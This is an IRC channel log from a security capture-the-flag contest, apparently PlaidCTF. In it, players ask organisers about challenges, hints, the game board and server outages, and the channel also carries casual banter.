  3314. (10:36:55) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 258 seconds
  3315. (10:38:05) ••• jOin: (drzoid) ([email protected])
  3316. (10:38:08) ([SF]testdata) @ mods : where is zfs hidden .. cant find it in game board
  3317. (10:38:23) (+frozencemetery) have you tried flipping it?
  3318. (10:38:38) (+frozencemetery) [SF]testdata: ^
  3319. (10:38:59) (zoff_ita) anybody for whatscat (web300)?
  3320. (10:40:00) ([SF]testdata) frozencemetery : nope , its not visible in the board.. any other identification or pointers pls ?
  3321. (10:40:12) (+tylerni7) zoff_ita: yeah wht's up
  3322. (10:40:13) (+tylerni7) pm me
  3323. (10:40:19) (+frozencemetery) [SF]testdata: this tells me you didn't read the rules, which you should do before playing any ctf.
  3324. (10:40:21) (+frozencemetery) so go do that
  3325. (10:40:25) ••• qUit: ([ToH]rbino) ([email protected]) Quit: leaving
  3326. (10:40:27) (+tylerni7) frozencemetery: eh
  3327. (10:40:42) (+tylerni7) rules: hack shit, get points; don't be a dick
  3328. (10:40:53) (+frozencemetery) tylerni7: also instructions on how to use the gameboard.
  3329. (10:41:07) (+tylerni7) sure, sure
  3330. (10:43:58) ••• jOin: (sqrts|stephan1) ([email protected])
  3331. (10:43:58) ••• qUit: (sqrts|stephan) ([email protected]) Read error: Connection reset by peer
  3332. (10:45:52) (player10) finally reekee
  3333. (10:45:57) ••• jOin: (ejo) ([email protected])
  3334. (10:46:17) (stypr) reekee something is wrong
  3335. (10:46:28) (stypr) I am angry right now.. I want to just solve that out
  3336. (10:46:35) ••• qUit: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197) Ping timeout: 240 seconds
  3337. (10:46:53) (stypr) it's like getting a cancer on your brain
  3338. (10:46:55) (depierre) anybody for web150?
  3339. (10:47:05) ••• qUit: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231) Ping timeout: 240 seconds
  3340. (10:47:29) (+tylerni7) depierre: you can pm me for questions
  3341. (10:48:14) (+mserrano) or me
  3342. (10:48:33) ••• qUit: (Otacon22) ([email protected]) Ping timeout: 245 seconds
  3343. (10:48:47) ••• jOin: (naam) ([email protected])
  3344. (10:48:58) ••• jOin: (copyleft_) ([email protected])
  3345. (10:50:31) ••• jOin: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231)
  3346. (10:51:23) (evertokki) so, i just came back and i see there are no hints lol
  3347. (10:51:33) ••• jOin: (nonroot) ([email protected])
  3348. (10:51:33) ••• qUit: (Stean) ([email protected]) Read error: Connection reset by peer
  3349. (10:51:50) ••• qUit: (EdHunter) ([email protected]) Remote host closed the connection
  3350. (10:52:16) (+tylerni7) evertokki: if you're stuck you can try pming me, but unless something is broken/misleading I probably can't say too much
  3351. (10:52:26) (c0ax) django fuuu
  3352. (10:52:28) (c0ax) -_-
  3353. (10:52:59) (+tylerni7) anyway, now that the site shits itself less frequently, I hope everyone is enjoying the game :)
  3354. (10:53:12) ••• pArt: (lkwpeter) ([email protected])
  3355. (10:53:37) (evertokki) tylerni7: :D thanks and plus, our team is enjoying the ctf :p
  3356. (10:53:52) ••• qUit: (Guest89597) ([email protected]) Quit: Leaving...
  3357. (10:54:32) (+tylerni7) cool, glad to hear it
  3358. (10:54:53) (+tylerni7) but yeah, the website fuckups are bad.. we're really sorry about that...
  3359. (10:55:01) (+tylerni7) we're gonna make things dead simple next year :|
  3360. (10:55:12) ••• qUit: (N3tAuG3r) ([email protected]) Quit: Leaving
  3361. (10:55:29) (player10) eindbazen ctf was smooth, maybe ask some tips from them
  3362. (10:55:29) ••• qUit: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173) Quit: Page closed
  3363. (10:55:30) (mak`) static pages with flags sendend via email? ;]
  3364. (10:56:00) (+mserrano) mak`: or ctfinafile
  3365. (10:56:34) (mak`) sound good to me ;]
  3366. (10:56:51) (+tylerni7) player10: we've run smooth ones before, we just try to do too much fancy things with ajax etc
  3367. (10:56:56) (+tylerni7) and it always ends up breaking things :|
  3368. (10:57:08) (ByteMyEth0) i think me and my team are out of our leagues here.
  3369. (10:57:15) (ByteMyEth0) being in highschool and what not
  3370. (10:57:17) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  3371. (10:57:22) (+tylerni7) ByteMyEth0: :( yeah, it's a tough CTF
  3372. (10:57:27) (+mserrano) ByteMyEth0: the ctf is a little tough for beginners, yeah
  3373. (10:57:30) (+tylerni7) you can always stop for now and read writeups next week
  3374. (10:57:37) (+tylerni7) CSAW and picoctf are great for beginners :)
  3375. (10:57:47) (+tylerni7) I think defcon quals this year will have a "beginner" category
  3376. (10:58:27) (ByteMyEth0) our school did pico. tied for 4th, 97, and then it was like 200
  3377. (10:58:40) (+tylerni7) cool
  3378. (10:58:41) (+tylerni7) :)
  3379. (10:58:52) (ByteMyEth0) hash slinging hackers
  3380. (10:59:50) (+tylerni7) ahhh nice
  3381. (11:00:05) (pcc7) any help on pyjail?
  3382. (11:00:18) ••• jOin: (EdHunter) ([email protected])
  3383. (11:01:19) ••• jOin: (Otacon22) ([email protected])
  3384. (11:01:30) (+mserrano) pcc7: you can pm me
  3385. (11:02:28) ••• jOin: (Yerer) ([email protected])
  3386. (11:02:52) (pez) did u publish any hints on rendevouz yet?
  3387. (11:03:08) (pez) published*
  3388. (11:03:09) (sven) http://play.plaidctf.com/problems/hints
  3389. (11:03:11) (sven) nope.
  3390. (11:03:16) (pez) thanks
  3391. (11:03:24) ••• jOin: (sekjrhkjr) ([email protected])
  3392. (11:03:27) (_ML) tylerni7: web300 down again
  3393. (11:03:33) (+tylerni7) _ML: ok looking at it
  3394. (11:03:35) ••• qUit: (approximatehack) (7ab33139@gateway/web/freenode/ip.122.179.49.57) Ping timeout: 240 seconds
  3395. (11:03:45) (chuckleberry) must be a real pain to host a popular ctf
  3396. (11:04:15) (+tylerni7) chuckleberry: I mean.. we've had quite a share of fuckups
  3397. (11:04:22) (+tylerni7) _ML: try now?
  3398. (11:04:58) (+tylerni7) I think the issue is there are people running tools, so when my script goes to refresh the database every hour, there is a lock contention which blocks for a long time
  3399. (11:05:04) • +tylerni7 should fix this
  3400. (11:05:12) (chuckleberry) tylerni7: i've never played in a ctf with some issues
  3401. (11:05:14) (chuckleberry) don't worry about it
  3402. (11:05:21) (chuckleberry) *without
  3403. (11:05:31) (+mserrano) yeah, but we'd still like to have fewer
  3404. (11:05:35) (chuckleberry) :)
  3405. (11:05:37) ••• jOin: (Meos) ([email protected])
  3406. (11:05:44) (_ML) tylerni7: ty, but maybe u should fork to another one
  3407. (11:05:45) (_ML) :D
  3408. (11:05:50) ••• qUit: (solo_) ([email protected]) Remote host closed the connection
  3409. (11:05:54) (chuckleberry) ah fork off
  3410. (11:05:55) (chuckleberry) hoooooooooooooo
  3411. (11:05:57) (chuckleberry) ok, i'll stop
  3412. (11:06:10) (Meos) any people?
  3413. (11:07:13) ••• jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
  3414. (11:07:17) ••• qUit: (mascot) ([email protected]) Quit: Leaving.
  3415. (11:07:18) (iZsh) almost there :)
  3416. (11:07:22) (iZsh) w8
  3417. (11:08:52) ••• qUit: (trelgak) ([email protected]) Quit: Leaving
  3418. (11:08:53) ••• qUit: (Luxerails) ([email protected])
  3419. (11:09:17) ••• jOin: (trelgak) ([email protected])
  3420. (11:10:22) (mak`) iZsh: dont rush to anything, take your time;]
  3421. (11:10:41) (iZsh) i'm not the one solving it :-)
  3422. (11:11:06) ••• qUit: (Yerer) ([email protected]) Ping timeout: 250 seconds
  3423. (11:11:43) (+dickoff) for anyone working on kappa make sure you have the correct binary, there was a wrong one available when it first came out: http://play.plaidctf.com/files/kappa-f2fdf7fcc074cb0c66c3d80a48286450.tar.bz2
  3424. (11:12:08) ••• jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
  3425. (11:12:21) (sven) yeah.. we learned that a little bit too late and wasted some time :D
  3426. (11:12:21) ••• jOin: (ggis) ([email protected])
  3427. (11:12:44) (+dickoff) yeah, sorry about that :(
  3428. (11:12:53) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
  3429. (11:13:02) ••• qUit: (Meos) ([email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
  3430. (11:13:28) (ByteMyEth0) i can't open kpop
  3431. (11:13:36) (ByteMyEth0) it might be me or everyone
  3432. (11:13:42) (+mserrano) wheeee kappa solve
  3433. (11:13:43) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  3434. (11:13:45) (x_x) Ot
  3435. (11:13:46) (+ricky) Nice, eindbazen!
  3436. (11:13:55) (x_x) ByteMyEth0: It's you. I've got kpop open.
  3437. (11:13:59) (+ricky) Er, I mean 0xffa
  3438. (11:14:07) (sven) \o/
  3439. (11:14:07) ••• jOin: (naam) ([email protected])
  3440. (11:14:30) (+tylerni7) -_-
  3441. (11:14:52) ••• qUit: (scnarc) ([email protected]) Ping timeout: 258 seconds
  3442. (11:15:13) ••• qUit: (elanthia) ([email protected]) Ping timeout: 245 seconds
  3443. (11:16:20) ••• jOin: (kan_) ([email protected])
  3444. (11:16:47) (iZsh) ricky: :)
  3445. (11:17:00) (iZsh) ricky: you wont work for the UN :)
  3446. (11:17:25) (+ricky) Hehe
  3447. (11:17:52) (iZsh) mmmm, maybe i should go to sleep someday
  3448. (11:17:54) (sven) pff.. the math doesn't even work out. 0xffa != eindbazen
  3449. (11:18:20) (phiber_) so in this board game, how do you know your position?
  3450. (11:18:32) (+ricky) It's the box with the lines I think
  3451. (11:18:34) (+tylerni7) sven: :P
  3452. (11:18:40) (+tylerni7) maybe if we add someone else
  3453. (11:18:44) (phiber_) this shit is confusing
  3454. (11:18:52) (+tylerni7) phiber_: dude, I don't know
  3455. (11:18:54) (+ricky) It's just problem opening stuff, I treat it as a crapshoot
  3456. (11:19:10) (ramsexy) phiber_: read the ruleZzZzZZz
  3457. (11:19:27) (phiber_) how do I vote
  3458. (11:19:33) (phiber_) just leave the number marked?
  3459. (11:19:43) (phiber_) or do I have to press some "invisible" button
  3460. (11:19:51) (+tylerni7) I think you press on the circly thing
  3461. (11:19:51) (ramsexy) phiber_: dude, you should seriously read the rules lol
  3462. (11:20:06) (+tylerni7) like I think you click a segment
  3463. (11:20:09) (iZsh) rtfm
  3464. (11:20:10) (+tylerni7) and that is your vote
  3465. (11:20:11) (phiber_) rules says "vote on how many blahblah"
  3466. (11:20:15) (phiber_) but now how do I vote
  3467. (11:20:18) (phiber_) not how*
  3468. (11:20:40) (ramsexy) click on the number
  3469. (11:20:52) (ramsexy) it's a global vote
  3470. (11:21:03) ••• jOin: (ghostpixel) ([email protected])
  3471. (11:21:06) (phiber_) and then wait till the voting period ends?
  3472. (11:21:12) (ramsexy) yaaa man
  3473. (11:21:20) (phiber_) oook
  3474. (11:21:20) ••• jOin: (almac) (458cf96e@gateway/web/freenode/ip.69.140.249.110)
  3475. (11:21:29) (phiber_) has there been any thing released?
  3476. (11:21:32) (ghostpixel) I'm so close to solving the heartbleed one, i have the key output but i'm not sure what part is the key...
  3477. (11:21:33) ••• jOin: (nofiki) ([email protected])
  3478. (11:21:41) (phiber_) any hint
  3479. (11:21:42) (+tylerni7) ghostpixel: the whole string
  3480. (11:21:43) (phiber_) god
  3481. (11:21:46) ••• jOin: (lfogel) ([email protected])
  3482. (11:21:47) (ramsexy) we should get a flag when we get how the ctf work
  3483. (11:21:48) (+tylerni7) including flag{}
  3484. (11:21:52) (iZsh) omg, phiber_ is trying to kill us
  3485. (11:21:52) (phiber_) has there been any hint released?
  3486. (11:22:01) (sven) pfrt, why do you always want hints?
  3487. (11:22:02) (+tylerni7) phiber_: wut
  3488. (11:22:02) (phiber_) I didn't sleep enough
  3489. (11:22:03) (sven) hints are boring!
  3490. (11:22:05) (ghostpixel) tylerni7: thanks
  3491. (11:22:10) (iZsh) phiber_: i didnt sleep at all
  3492. (11:22:21) (pcc7) any one working on pyjail?
  3493. (11:22:25) (iZsh) sven: and they fuck up strategies :)
  3494. (11:22:40) (phiber_) tylerni7, the rules says there's a 5% chance of hint
  3495. (11:22:41) (iZsh) same thing for not releasing challs beforehand :)
  3496. (11:22:49) (+tylerni7) phiber_: oh yeah dude I dunno how that works
  3497. (11:22:59) (+tylerni7) I haven't had a chance to read the rules
  3498. (11:23:03) (phiber_) I'm asking if there has been any hints released in previous voting periods
  3499. (11:23:32) (ramsexy) i think the hints are global too? am i right?
  3500. (11:23:37) ••• qUit: (Neuroticar) (~neurotica@unaffiliated/neuroticar) Quit: Leaving
  3501. (11:23:43) (mischa__) where is this reekee key, am i blind?
  3502. (11:23:50) ••• pArt: (ghostpixel) ([email protected])
  3503. (11:24:11) (+tylerni7) mischa__: you need code exec
  3504. (11:24:18) ••• pArt: (Butters_Idle) ([email protected]) "Leaving"
  3505. (11:24:36) (iZsh) onoes hint :)
  3506. (11:26:25) (KT) do we know the libc version used for the challs (ezhp for example)?
  3507. (11:26:50) (pcc7) is pyjail smth about thread?.
  3508. (11:26:51) (+mserrano) you shouldn't need it
  3509. (11:27:27) (dracu) how much time between chronosphere discharges ? (in general, or is it random ?)
  3510. (11:27:35) ••• jOin: (sadcat) ([email protected])
  3511. (11:27:43) (+tylerni7) dracu: it "recharges" when a new problem is solved
  3512. (11:27:45) (sven) i think it's related to the number of unsolved challenges
  3513. (11:28:36) (+tylerni7) no
  3514. (11:28:41) (dracu) ok, nice
  3515. (11:28:42) (+tylerni7) there are a few challenges no one has solved
  3516. (11:29:07) (pcc7) well..
  3517. (11:30:05) (ramsexy) why you voted chance :(
  3518. (11:30:23) (+tylerni7) I think a new problem will open too
  3519. (11:31:15) ••• jOin: (kris) ([email protected])
  3520. (11:31:24) (iZsh) are you sure you're chance's seed is not bugged?
  3521. (11:31:37) (iZsh) i dont recall anything but "unlucky" on "chance"
  3522. (11:31:46) (iZsh) s/you're/your
  3523. (11:32:07) (+tylerni7) I think the chance of it hitting is like 10%
  3524. (11:32:12) (+tylerni7) which is pretty low...
  3525. (11:32:23) (Anyny0) 70% chance of having nothing
  3526. (11:32:27) (Anyny0) It's in the rules
  3527. (11:32:31) (ramsexy) does the empty tiles count?
  3528. (11:32:35) ••• jOin: (pending12315) ([email protected])
  3529. (11:32:43) (+tylerni7) I think empty tiles are skipped over
  3530. (11:32:54) (iZsh) well, chance is for the weak they say
  3531. (11:33:07) (+tylerni7) who says that :P
  3532. (11:33:13) ••• jOin: (XPenguin) ([email protected])
  3533. (11:33:23) ••• qUit: (tedmeyer) ([email protected]) Remote host closed the connection
  3534. (11:33:36) (Zoro) What's chance?
  3535. (11:33:59) (ShortKidd) It's not quite guarenteed
  3536. (11:34:11) ••• qUit: (naam) ([email protected]) Ping timeout: 240 seconds
  3537. (11:34:14) (Reinhart) you have no chance to survive
  3538. (11:34:17) (Reinhart) make your time
  3539. (11:34:24) (+mserrano) ._.
  3540. (11:34:38) (bobsteam) take off every zig
  3541. (11:36:20) ••• jOin: (approximatehack) (7ab354c7@gateway/web/freenode/ip.122.179.84.199)
  3542. (11:36:23) (+tylerni7) whee... this will be fun
  3543. (11:36:38) (sven) yay, crypto :D
  3544. (11:36:56) (+tylerni7) yeah, about as hard as rsa by our estimates
  3545. (11:37:05) (+tylerni7) though of course, rsa is forensics, not crypto ;)
  3546. (11:37:10) • +tylerni7 coughs
  3547. (11:37:48) (NK_) :D
  3548. (11:38:00) ••• qUit: (asdfafs) (afc14aa8@gateway/web/freenode/ip.175.193.74.168) Quit: Page closed
  3549. (11:38:14) ••• qUit: (quangntenemy) ([email protected]) Quit: Leaving
  3550. (11:38:29) (hellman) cool, crypto
  3551. (11:38:29) ••• qUit: (ejo) ([email protected]) Ping timeout: 252 seconds
  3552. (11:38:53) ••• jOin: (Amnesia) (~Amnesia@unaffiliated/amnesia)
  3553. (11:39:00) (+tylerni7) hellman: maan solve rsa first
  3554. (11:39:06) ••• jOin: (oej) ([email protected])
  3555. (11:39:10) (+tylerni7) :)
  3556. (11:39:27) (hellman) no no, i hate rsa now
  3557. (11:39:34) (+mserrano) :(
  3558. (11:39:35) (+tylerni7) D:
  3559. (11:39:36) (+tylerni7) aww
  3560. (11:39:39) ••• qUit: (pending12315) ([email protected]) Quit: pending12315
  3561. (11:39:40) (sven) <3 rsa
  3562. (11:39:46) (player10) is brute forcing of any kind expected for challenges?
  3563. (11:39:49) (+tylerni7) sven: were you the one to get it
  3564. (11:39:55) (sven) nope
  3565. (11:39:58) (sven) i'm just idling
  3566. (11:40:05) ••• qUit: (ByteMyEth0) (18fe8dec@gateway/web/freenode/ip.24.254.141.236) Ping timeout: 240 seconds
  3567. (11:40:06) ••• jOin: (mang) ([email protected])
  3568. (11:40:09) ••• nIck: (mang) is now known as (pending)
  3569. (11:40:21) ••• nIck: (pending) is now known as (amayzing)
  3570. (11:40:33) ••• qUit: (nofiki) ([email protected]) Quit: Leaving.
  3571. (11:40:54) ••• nIck: (amayzing) is now known as (checkmayte)
  3572. (11:41:06) ••• jOin: (dudes) ([email protected])
  3573. (11:41:06) ••• jOin: (alamar) (alamar@2a02:180:a:1:1::110)
  3574. (11:41:10) ••• jOin: (nofiki) ([email protected])
  3575. (11:41:18) ••• jOin: (filky) (4e81ae54@gateway/web/freenode/ip.78.129.174.84)
  3576. (11:41:38) (filky) hey, who solved web200 (songs), this chall makes me crazy
  3577. (11:42:06) ••• qUit: (chris____) ([email protected]) Quit: Lost terminal
  3578. (11:42:49) (+mserrano) player10: only for a very small number
  3579. (11:42:57) (+mserrano) whee for example requires bruteforcing some sha proof of work
  3580. (11:43:11) (+mserrano) (because otherwise dos'ing it would be too easy)
  3581. (11:43:19) (psifertex) is someone breaking reeekeeeeee?
  3582. (11:43:19) (player10) ok
  3583. (11:43:56) ••• qUit: (checkmayte) ([email protected]) Client Quit
  3584. (11:43:57) (psifertex) db keeps getting nuked pretty quickly and just now it appears in an odd state where /make/ returns nothing, though main shows I'm still logged in.
  3585. (11:44:09) (psifertex) (for multiple users too, so it's not just one messed up user)
  3586. (11:44:29) ••• jOin: (checkmayte) ([email protected])
  3587. (11:44:39) (+tylerni7) should only get nuked every 20 minutes
  3588. (11:44:41) (psifertex) yeah. failed to create user. someone screwed with the sqlite, maybe?
  3589. (11:44:48) (+tylerni7) yeah sometimes sqlite gets messed up
  3590. (11:44:50) (+tylerni7) I'll take a look
  3591. (11:44:51) (+tylerni7) h/o
  3592. (11:44:55) (psifertex) thx.
  3593. (11:45:23) ••• qUit: (nofiki) ([email protected]) Ping timeout: 240 seconds
  3594. (11:45:51) (pcc7) anyone working on pyjail?
  3595. (11:46:07) (+tylerni7) can psifertex seems to be working now, at least for me
  3596. (11:46:08) ••• qUit: (checkmayte) ([email protected]) Client Quit
  3597. (11:46:12) ••• jOin: (factoreal) ([email protected])
  3598. (11:46:25) (+tylerni7) pm me to describe the issues more if it's still sad
  3599. (11:46:28) (tarkiz) lol I keep just trying to solve twenty :\
  3600. (11:47:04) ••• jOin: (checkmayte) ([email protected])
  3601. (11:47:26) ••• jOin: (naam) ([email protected])
  3602. (11:47:42) • +tylerni7 assumes the silence means things are working
  3603. (11:48:11) ([pwn]TM) tylerni7: we can make some noise if you want it!
  3604. (11:48:14) ••• pArt: (tonic1) ([email protected])
  3605. (11:48:24) (+tylerni7) heh
  3606. (11:48:28) (+tylerni7) it's okay :P
  3607. (11:48:38) (bobsteam) http://www.youtube.com/watch?v=_6-KspZegsE NOISE!
  3608. (11:49:40) ••• jOin: (nadar) ([email protected])
  3609. (11:49:40) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
  3610. (11:50:05) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3611. (11:50:23) ••• qUit: (shabgard) (~mostafa@unaffiliated/shabgard) Read error: Connection reset by peer
  3612. (11:50:32) ••• qUit: (oej) ([email protected]) Ping timeout: 250 seconds
  3613. (11:50:49) ••• jOin: (oej) ([email protected])
  3614. (11:51:28) ••• jOin: (jakemask) ([email protected])
  3615. (11:52:05) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  3616. (11:55:00) ••• jOin: (nope_) (a2f31ed0@gateway/web/freenode/ip.162.243.30.208)
  3617. (11:55:11) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
  3618. (11:55:28) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3619. (11:55:44) ••• jOin: (cybercybercyber) ([email protected])
  3620. (11:56:29) ••• qUit: (filky) (4e81ae54@gateway/web/freenode/ip.78.129.174.84) Quit: Page closed
  3621. (11:57:14) ••• jOin: (n00bz) ([email protected])
  3622. (11:57:25) (n00bz) who is doing reekee?
  3623. (12:01:29) ••• mOde: (ChanServ) sets (+o mserrano)
  3624. (12:01:34) ••• tOpic: (mserrano) changes topic to (CTF has started but server is having issues | play.plaidctf.com)
  3625. (12:01:37) ••• pArt: (jakemask) ([email protected])
  3626. (12:01:51) ••• mOde: (mserrano) sets (-o mserrano)
  3627. (12:02:03) (evertokki) is hudak like, the korean word i think it is?
  3628. (12:02:07) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
  3629. (12:02:32) ••• qUit: (naam) ([email protected]) Ping timeout: 276 seconds
  3630. (12:02:56) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3631. (12:03:11) (plo) g++ doesn't compile?
  3632. (12:03:20) (+tylerni7) plo: it should?
  3633. (12:03:59) (humper) it should compile with default key
  3634. (12:04:05) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
  3635. (12:04:05) (plo) I don't think so :p
  3636. (12:04:40) (plo) just to be sure, because (I hope) I think I'm close
  3637. (12:05:56) (humper) i solved it and it compiled with default key
  3638. (12:05:56) (+tylerni7) it really should compile
  3639. (12:06:05) ••• jOin: (HotShot) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
  3640. (12:06:22) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3641. (12:08:16) (iago-x86) tenement is timing out
  3642. (12:08:35) ••• qUit: (j0f) (~j0f@unaffiliated/j0f) Read error: Connection reset by peer
  3643. (12:08:38) (iago-x86) ah, there it goes
  3644. (12:08:41) • iago-x86 carries on
  3645. (12:08:51) (+tylerni7) iago-x86: hm ok
  3646. (12:09:12) ••• jOin: (j0f) (~j0f@unaffiliated/j0f)
  3647. (12:09:32) (Hertz_) anyone doing Paris ?
  3648. (12:10:00) (criple_ripper) hi any admin i can ask smt about whatscat?
  3649. (12:10:01) (robbje) Hertz_: ew.
  3650. (12:10:06) (+tylerni7) criple_ripper: sure
  3651. (12:10:10) (robbje) Paris Hilton?
  3652. (12:10:16) (hellman) who can i ask on wheeeeeee (crypto) ?
  3653. (12:10:23) (+tylerni7) hellman: me or mserrano
  3654. (12:10:45) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  3655. (12:10:56) (Hertz_) yes robbje
  3656. (12:10:57) (Hertz_) :))
  3657. (12:11:16) ••• qUit: (kan_) ([email protected]) Remote host closed the connection
  3658. (12:11:51) ••• qUit: (knuckles) ([email protected]) Ping timeout: 252 seconds
  3659. (12:12:40) (+gbarboza) iago-x86: I rebooted the old box, there's a new IP in the problem desc that you should use.
  3660. (12:13:17) ••• qUit: (checkmayte) ([email protected]) Quit: checkmayte
  3661. (12:13:47) (iago-x86) gbarboza: cool, thanks!
  3662. (12:14:40) (tarkiz) so is there a way to tell which number on the wheel corresponds with which category?
  3663. (12:14:50) ••• qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
  3664. (12:15:10) ••• jOin: (naam) ([email protected])
  3665. (12:15:15) (+tylerni7) tarkiz: I think when you hover or click during a voting period, it will tell you
  3666. (12:15:25) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  3667. (12:15:29) (tarkiz) okay I'll check that out next time...ty
  3668. (12:15:31) ••• qUit: (nectoo) ([email protected]) Ping timeout: 252 seconds
  3669. (12:15:34) ••• jOin: (checkmayte) ([email protected])
  3670. (12:15:52) • evertokki needs hint, vote 2 next timez
  3671. (12:16:05) ••• jOin: (inter) ([email protected])
  3672. (12:16:15) (sven) new challenges >>> hints :P
  3673. (12:16:29) (bobsteam) anyone up for a question on reekee
  3674. (12:16:31) (evertokki) :P
  3675. (12:16:45) (+tylerni7) bobsteam: you can pm me
  3676. (12:17:03) (+tylerni7) might not tell you the answer though, depending on the question :)
  3677. (12:17:12) (inter) tylerni7: what happened to TheRealTyler
  3678. (12:17:21) (inter) and tylerma7
  3679. (12:17:27) • +tylerni7 shrugs
  3680. (12:17:34) (+mserrano) we launched nuclear weapons at them
  3681. (12:17:40) (+tylerni7) aren't we all TheRealTyler, in our hearts?
  3682. (12:17:53) (inter) what if i am christ
  3683. (12:17:55) ••• jOin: (nullProtectorate) ([email protected])
  3684. (12:18:00) (inter) hesus mehico christ
  3685. (12:18:15) (+frozencemetery) "mehico"?
  3686. (12:18:40) ••• qUit: (slinkyman) ([email protected]) Ping timeout: 240 seconds
  3687. (12:19:20) ••• jOin: (nofiki1) ([email protected])
  3688. (12:19:23) ••• qUit: (nofiki1) ([email protected]) Client Quit
  3689. (12:19:58) (evertokki) lol
  3690. (12:20:04) ••• jOin: (funtimes) ([email protected])
  3691. (12:20:35) (funtimes) is g++ supposed to have keys that will not compile?
  3692. (12:20:38) (+dickoff) will the real tylerni7 please stand up
  3693. (12:20:43) • +tylerni7 stands up
  3694. (12:20:53) (inter) Automatic stabilizers are changes in ?scal policy that stimulate aggregate demand when the
  3695. (12:20:53) (inter) economy goes into a recession without policymakers having to take any deliberate action; eg,
  3696. (12:21:00) (+tylerni7) funtimes: it should compile..
  3697. (12:21:01) (inter) #econ
  3698. (12:21:15) (funtimes) tyler i've got 2 keys that will not so far
  3699. (12:21:18) (evertokki) anyone to pm for hudak?
  3700. (12:21:23) ••• qUit: (naam) ([email protected]) Ping timeout: 240 seconds
  3701. (12:21:42) (funtimes) compiler just keeps going
  3702. (12:21:52) (+tylerni7) funtimes: some keys probably make it very sad
  3703. (12:21:53) (funtimes) just about crashed comp actually
  3704. (12:22:04) ••• jOin: (scnarc) ([email protected])
  3705. (12:22:04) (+mserrano) evertokki: me
  3706. (12:22:04) (+tylerni7) yeah, I segfaulted g++ and clang many times
  3707. (12:22:11) ••• qUit: (nullProtectorate) ([email protected]) Ping timeout: 240 seconds
  3708. (12:22:12) (inter) g++
  3709. (12:22:17) (inter) was rather easier cypher
  3710. (12:22:21) (inter) than rsa
  3711. (12:22:31) (inter) thanks to tylerni7, wut a dickoff
  3712. (12:22:45) (+tylerni7) inter: did you solve rsa? :)
  3713. (12:22:56) (inter) what if i told you no
  3714. (12:23:02) (inter) but i got tiffany
  3715. (12:23:29) (+mserrano) :)
  3716. (12:23:32) (+mserrano) did you like it?
  3717. (12:23:34) (+tylerni7) I mean, that's fine, I was just curious
  3718. (12:23:46) (inter) tiffany was interesting
  3719. (12:24:04) (inter) i would give it 10/10 technicality
  3720. (12:24:19) (inter) i would give it 2.5/10 for how nice the problem was
  3721. (12:24:25) (+tylerni7) hahahaha
  3722. (12:24:27) (+mserrano) lol
  3723. (12:24:42) • sven wants some reversing problems that aren't x86/x86_64 :<
  3724. (12:24:54) (inter) sven: 16bit vm
  3725. (12:24:57) (inter) back in gits
  3726. (12:25:02) (inter) or ndh?
  3727. (12:25:05) (inter) that was real
  3728. (12:25:13) (sven) gits? ndh?
  3729. (12:25:21) (inter) calculating payload was ridiculous
  3730. (12:25:21) (sven) i don't play a lot of ctf
  3731. (12:25:24) (inter) ghost in the shellcode
  3732. (12:25:41) (sven) arm, mips, powerpc... anything but plz not x86
  3733. (12:25:46) ••• qUit: (DeadheadTn) ([email protected]) Quit: Leaving
  3734. (12:25:51) (sven) x86 makes me really angry
  3735. (12:25:57) (+mserrano) :(
  3736. (12:25:58) (+mserrano) why
  3737. (12:26:00) (+tylerni7) heh
  3738. (12:26:12) ••• jOin: (Kasalehlia) ([email protected])
  3739. (12:26:13) (sven) 'cause it needs to die in a huge and horrible fire
  3740. (12:26:20) (inter) tylerni7 was too lazy
  3741. (12:26:20) (chuckleberry) don't listen to him, more x86
  3742. (12:26:27) (sven) the only way i look at x86 stuff is with hex-rays :)
  3743. (12:26:35) (+mserrano) I think we have a good amount of x86 problems
  3744. (12:26:35) ••• qUit: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105) Ping timeout: 240 seconds
  3745. (12:26:39) (chuckleberry) ugh
  3746. (12:26:43) (chuckleberry) hexrays sucks
  3747. (12:26:43) (inter) because the name was "reversing"
  3748. (12:26:46) (inter) i was actually expecting
  3749. (12:26:49) (inter) windows exes
  3750. (12:26:49) (chuckleberry) so many casts
  3751. (12:26:50) (sven) and more architectures would make it a lot more interesting - you need different tricks/approches for each of them
  3752. (12:26:55) (inter) but then i get elfs
  3753. (12:26:59) (inter) real whores
  3754. (12:27:00) (+mserrano) inter: we have a windows exe
  3755. (12:27:07) (inter) like one
  3756. (12:27:07) (+mserrano) no one has solved it!
  3757. (12:27:27) (sven) yeah, well. it's windows and x86. can't get much worse ;)
  3758. (12:27:34) (+mserrano) lol
  3759. (12:27:37) (inter) i uses cracked ida >:)
  3760. (12:28:15) ••• jOin: (Stean) ([email protected])
  3761. (12:29:54) (pcc7) eh anyone working on pyjail......
  3762. (12:30:13) (sven) nah, we're all long done with that one
  3763. (12:30:24) (+mserrano) bamboooooooooooooooooooooooooooooooo
